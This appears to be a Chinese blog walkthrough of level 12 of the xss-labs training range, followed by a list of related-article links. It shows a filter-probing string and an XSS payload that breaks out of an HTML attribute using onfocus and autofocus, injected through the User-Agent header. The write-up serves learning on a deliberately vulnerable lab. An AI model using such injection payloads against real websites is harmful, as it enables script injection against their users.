查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
有一个好名字1 分钟前
Agent Loop —— 一切从那个 while 循环开始一天睡25小时3 分钟前
Claude Code 指令入门教程yingyima19 分钟前
正则表达式实战:从日志中精准提取关键字段TeamDev28 分钟前
如何在 DotNetBrowser 中使用本地 AI 模型谢尔登1 小时前
10_从 React Hooks 本质看 useState辰同学ovo1 小时前
从全局登录状态管理学习 Redux陈随易1 小时前
2年没用Nodejs了,Bun很香donecoding1 小时前
Corepack 完全解析:从懵到懂,包管理器自由了yqcoder1 小时前
端经典面试题:为什么 0.1 + 0.2 !== 0.3?ZC跨境爬虫2 小时前
跟着 MDN 学 HTML day_12:(HTML网页图片嵌入)